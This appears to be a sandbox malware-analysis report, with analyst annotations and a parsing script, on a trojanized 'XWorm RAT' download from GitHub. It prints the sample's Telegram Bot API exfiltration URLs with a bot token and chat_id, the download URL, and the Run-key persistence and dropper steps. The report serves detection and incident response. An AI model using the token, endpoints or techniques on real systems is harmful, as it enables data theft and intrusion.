Analysis
  max time kernel: 295s
  max time network: 299s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 20-10-2024 21:42

Tasks
  Static task: static1
  URLScan task: urlscan1
  Behavioral task: behavioral1
    Sample: https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
    Resource: win10v2004-20241007-en
General
  Target: https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Malware Config
Extracted configuration, family label "gurcu" (the sandbox's name for a Telegram-exfiltrating stealer). Every endpoint is the Telegram Bot API with a single bot token and a single chat_id. The first and last URL and the getUpdates offset are cut off in the report and are reproduced here as they appear.
  https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.23%20kb
  https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage?chat_id=2024893777
  https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates?offset=-
  https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take
What the URLs tell a responder: sendDocument and sendMessage to chat_id 2024893777 are the exfiltration path (the percent-encoded captions decode to the upload notes "📂 - Browser data" with a tree listing "cookies(0.25 kb)" and "BrowserDownloads.txt (0.23 kb", and "📸Screenshot take", i.e. browser data and screenshots), while getUpdates reads messages sent to the bot, so the same channel also carries input back to the implant. The indicators to hunt on are the bot token 6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y (its numeric prefix 6840643388 is the bot's Telegram user id) and chat_id 2024893777; api.telegram.org itself is legitimate traffic, so match on the token in the request path rather than on the host alone.
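Added example, not part of the sandbox report: the script below turns the four extracted URLs (copied verbatim, including the truncation) into the indicators a responder acts on, decoding the UTF-8 captions on the way. The function names and the output field names are my own; nothing here contacts Telegram.

```python
"""Parse the Telegram Bot API URLs extracted from the sample's configuration."""
import re
from urllib.parse import parse_qs, urlsplit

# Token format is <bot user id>:<secret>; the method is the path segment after it.
TELEGRAM_BOT_URL = re.compile(
    r"^https://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>\w+)")

# Copied from the report's "Malware Config" section, truncated where the report truncates.
EXTRACTED_URLS = [
    "https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument"
    "?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80"
    "%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84"
    "%20-%20BrowserDownloads.txt%20(0.23%20kb",
    "https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage"
    "?chat_id=2024893777",
    "https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates"
    "?offset=-",
    "https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument"
    "?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take",
]


def parse_bot_url(url):
    """Token, bot id, method and decoded query for one URL; None if not a Bot API call."""
    m = TELEGRAM_BOT_URL.match(url)
    if not m:
        return None
    query = parse_qs(urlsplit(url).query)  # percent-decodes, including the UTF-8 caption
    return {
        "token": m["token"],
        "bot_id": int(m["token"].split(":", 1)[0]),  # numeric prefix = bot's user id
        "method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "caption": query.get("caption", [None])[0],
        "params": sorted(query),
    }


def summarize_c2(urls):
    """Collapse the URL list into the few indicators worth blocking or hunting on."""
    parsed = [p for p in map(parse_bot_url, urls) if p]
    methods = {p["method"] for p in parsed}
    return {
        "tokens": sorted({p["token"] for p in parsed}),
        "bot_ids": sorted({p["bot_id"] for p in parsed}),
        "chat_ids": sorted({p["chat_id"] for p in parsed if p["chat_id"]}),
        "methods": sorted(methods),
        "captions": [p["caption"] for p in parsed if p["caption"]],
        # getUpdates fetches messages sent to the bot, so the channel is two-way
        "reads_incoming_messages": "getUpdates" in methods,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize_c2(EXTRACTED_URLS), indent=2, ensure_ascii=False))
```

The regex keys on the token in the path rather than on the host, which is the only reliable way to separate this traffic from legitimate Telegram use on the same network; a truncated caption still decodes, it just ends mid-string, so nothing is lost by feeding the report's cut-off lines in as they are.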
Signatures

Blocklisted process makes network request (7 IoCs)
  flow  pid   Process
  155   1156  powershell.exe
  156   1156  powershell.exe
  157   1156  powershell.exe
  158   1156  powershell.exe
  159   3696  powershell.exe
  162   3696  powershell.exe
  163   3696  powershell.exe
  (PID 3696 does not appear in the visible part of the process list below, which is cut off at the end of the report.)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                 Process
  Key value queried  \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation  Command Reciever.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation  Update.exe
Executes dropped EXE (4 IoCs)
  pid   Process
  2436  Command Reciever.exe
  3568  Update.exe
  5084  XWorm.exe
  2308  XWorm.exe

Loads dropped DLL (3 IoCs)
  pid   Process
  2436  Command Reciever.exe
  3568  Update.exe
  4008  XHVNC.exe
Obfuscated with Agile.Net obfuscator (1 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
  resource: behavioral1/memory/4008-329-0x0000000006050000-0x0000000006274000-memory.dmp
  yara_rule: agile_net
  (PID 4008 is XHVNC.exe in the process list; the rule hit on a memory region of the running process, not on the file.)
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                                                                                         Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe"  reg.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow  ioc
  98    raw.githubusercontent.com
  101   raw.githubusercontent.com
  97    raw.githubusercontent.com
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  94    ip-api.com
Obfuscated Files or Information: Command Obfuscation (1 TTPs)
Adversaries may obfuscate content during command execution to impede detection. In this run the obfuscation is visible in the command line of powershell.exe PID 4804 in the process list: PowerShell block comments (<#nci#>, <#nqz#>) spliced into the statement.
Enumerates processes with tasklist (1 TTPs, 1 IoCs)
  pid   Process
  3448  tasklist.exe
Suspicious use of SetThreadContext (2 IoCs)
  description                          pid   Process    procid_target
  PID 5084 set thread context of 3724  5084  XWorm.exe  168
  PID 2308 set thread context of 2044  2308  XWorm.exe  175
  (3724 is the second AppLaunch.exe child of XWorm.exe 5084 in the process list, the one that goes on to run PowerShell. The matching child of XWorm.exe 2308 is cut off at the end of the process list; PID 2044 also appears earlier as an Edge identity_helper.exe, a PID reused during the run.)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 11 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                    Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  AppLaunch.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  AppLaunch.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  XWorm RAT V2.1.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Command Reciever.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  XWorm.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  XHVNC.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  XWorm.exe
Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                  Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0             Update.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  Update.exe
  Key opened         \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0             Command Reciever.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz        Command Reciever.exe
Delays execution with timeout.exe (1 IoCs)
  pid   Process
  2540  timeout.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                               Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Modifies registry class (2 IoCs)
  description  ioc                                                                                     Process
  Key created  \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings  OpenWith.exe
  Key created  \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings  msedge.exe
Modifies registry key (1 TTPs, 1 IoCs)
  pid   Process
  4856  reg.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Repeated rows collapsed; runs are listed in order of appearance.
  pid   Process               events
  1524  msedge.exe            2
  3608  msedge.exe            2
  2908  identity_helper.exe   2
  4824  msedge.exe            2
  2436  Command Reciever.exe  22
  3568  Update.exe            20
  3504  Command Reciever.exe  6
  3568  Update.exe            2
  3504  Command Reciever.exe  6
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid   Process
  4484  OpenWith.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (18 IoCs)
  pid   Process     events
  3608  msedge.exe  18
Suspicious use of AdjustPrivilegeToken (11 IoCs)
  description                 pid   Process
  Token: SeDebugPrivilege     2436  Command Reciever.exe
  Token: SeDebugPrivilege     3448  tasklist.exe
  Token: SeDebugPrivilege     3568  Update.exe
  Token: SeRestorePrivilege   3504  7zG.exe
  Token: 35                   3504  7zG.exe
  Token: SeSecurityPrivilege  3504  7zG.exe
  Token: SeSecurityPrivilege  3504  7zG.exe
  Token: SeDebugPrivilege     1156  powershell.exe
  Token: SeDebugPrivilege     4804  powershell.exe
  Token: SeDebugPrivilege     3696  powershell.exe
  Token: SeDebugPrivilege     2056  powershell.exe
  ("Token: 35" is privilege LUID 35, SeCreateSymbolicLinkPrivilege; together with SeRestore/SeSecurity it is what 7-Zip enables while extracting, so the 7zG.exe rows are benign. The SeDebugPrivilege rows on the dropped executables and the PowerShell instances are the ones that matter; PIDs 3696 and 2056 fall in the cut-off tail of the process list.)
Suspicious use of FindShellTrayWindow (64 IoCs)
  pid   Process     events
  3608  msedge.exe  64
Suspicious use of SendNotifyMessage (26 IoCs)
  pid   Process               events
  3608  msedge.exe            24
  3504  Command Reciever.exe  2
Suspicious use of SetWindowsHookEx (30 IoCs)
  pid   Process       events
  3568  Update.exe    1
  4008  XHVNC.exe     2
  4484  OpenWith.exe  27
Suspicious use of WriteProcessMemory (64 IoCs)
  All 64 events are the Edge browser process (PID 3608) writing into its own child processes at startup: 4628 is its crashpad-handler, 3648 its gpu-process, 1524 its network service and 1940 its storage service in the process list. Repeated rows collapsed.
  description                        pid   Process     procid_target  events
  PID 3608 wrote to memory of 4628   3608  msedge.exe  84             2
  PID 3608 wrote to memory of 3648   3608  msedge.exe  85             (repeated)
  PID 3608 wrote to memory of 1524   3608  msedge.exe  86             2
  PID 3608 wrote to memory of 1940   3608  msedge.exe  87             (repeated)
  (the 3648 and 1940 rows together account for the remaining 60 events)
Processes
Entries are listed in process-tree order; the bracketed number is the depth in the tree and indentation follows it. PIDs are reused during the 295 s run (3504 is an Edge gpu-process, a Command Reciever.exe instance and 7zG.exe at different times; 840 is find.exe and later WmiApSrv.exe; 5036 is two different cmd.exe instances; 2044 is an Edge identity_helper.exe and later a SetThreadContext target), so match signatures to entries by parent chain and image path, not by PID alone. Under the browser, the quarantine.mojom.Quarantine utility processes are the Edge service that stamps completed downloads with the Mark-of-the-Web.
[1] PID 3608  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
    Signatures: Enumerates system info in registry; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
  [2] PID 4628  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f7dc46f8,0x7ff9f7dc4708,0x7ff9f7dc4718
  [2] PID 3648  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
  [2] PID 1524  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
      Signatures: Suspicious behavior: EnumeratesProcesses
  [2] PID 1940  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
  [2] PID 4288  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  [2] PID 1312  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  [2] PID 2044  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
  [2] PID 2908  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
  [2] PID 4544  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  [2] PID 3368  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
  [2] PID 664  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  [2] PID 1612  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
  [2] PID 4460  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5420 /prefetch:8
  [2] PID 2740  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  [2] PID 4824  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7164 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
  [2] PID 3504  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1256 /prefetch:2
  [2] PID 2104  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
  [2] PID 4548  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
  [2] PID 4608  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1
  [2] PID 4456  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
  [2] PID 4028  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  [2] PID 1588  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
  [2] PID 4576  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
  [2] PID 2660  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3504 /prefetch:8
  [2] PID 1340  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
  [2] PID 3068  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
  [2] PID 4528  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
  [2] PID 4448  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8
  [2] PID 2100  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
  [2] PID 2800  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
[1] PID 4968  C:\Windows\System32\CompPkgSrv.exe
    Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
[1] PID 2812  C:\Windows\System32\CompPkgSrv.exe
    Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
[1] PID 3508  C:\Windows\System32\rundll32.exe
    Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] PID 116  C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe
    Command line: "C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe"
    Signatures: System Location Discovery: System Language Discovery
    Two instances of Command Reciever.exe run under this builder: one from the release directory (PID 3504) and a dropped copy in %TEMP% (PID 2436). Only the dropped copy stages persistence: its batch file (tmpBA33.tmp.bat, deleted once run) checks whether its parent PID 2436 is still running (tasklist /fi "PID eq 2436", find ":", Timeout /T 1) and then starts Update.exe from %APPDATA%\GoogleChromeUpdateLogger, which registers itself under HKCU\...\Run as "ChromeUpdater". The "leaked RAT" download is itself the trojan.
